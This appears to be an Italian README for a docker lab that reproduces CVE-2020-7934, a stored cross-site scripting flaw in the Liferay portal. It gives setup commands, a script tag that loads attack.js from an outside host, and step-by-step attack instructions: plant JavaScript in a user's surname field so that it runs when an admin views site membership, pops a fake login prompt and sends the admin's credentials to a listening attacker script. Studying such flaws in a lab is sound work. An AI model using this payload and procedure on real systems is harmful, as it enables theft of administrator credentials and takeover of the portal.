CVE 2020-7934
Come eseguire CVE
Requisiti
- docker
Osservazioni
è possibile mettere lo script di attacco online (dato il codice js) http://yourjavascript.com/
Il nostro script JS online per l'attacco
html <script src="http://yourjavascript.com/920172199111/attack.js"></script>
Comandi per la configurazione
- vai alla cartella radice di questo progetto
- esegui "sudo docker-compose up --build"
- nuovo terminale: esegui "docker inspect liferay" ==> e copia il valore IPAddress
- nuovo terminale: esegui "python api_attacker.py"
- apri un browser e vai a "http://IPAddress:8080" ==> dovresti ottenere il portale liferay come risposta
- per fermare ed eliminare i container usa "sudo docker-compose rm"
Istruzioni per l'attacco
- Registrati in liferay come utente, accedi e, nella sezione "siti disponibili", unisciti al sito "liferay".
- Cambia il "cognome" in uno script JS (direttamente () o tramite un "src =" http ... "")
- Accedi come admin liferay (username: [email protected], password: test)
- Vai ai siti disponibili e clicca su "liferay", si aprirà la pagina pubblica di questo sito.
- Vai alla nuova pagina, si aprirà un menu a destra, clicca su iscrizione.
- Seleziona l'utente registrato al passo 1. In quel momento lo script verrà eseguito.
5.1) Nello script attack.js la pagina chiederà le credenziali.
- Nel terminale del passo 5 (dei Comandi per la configurazione) verranno stampati username/password inseriti in 5.1 ( dall'admin ) )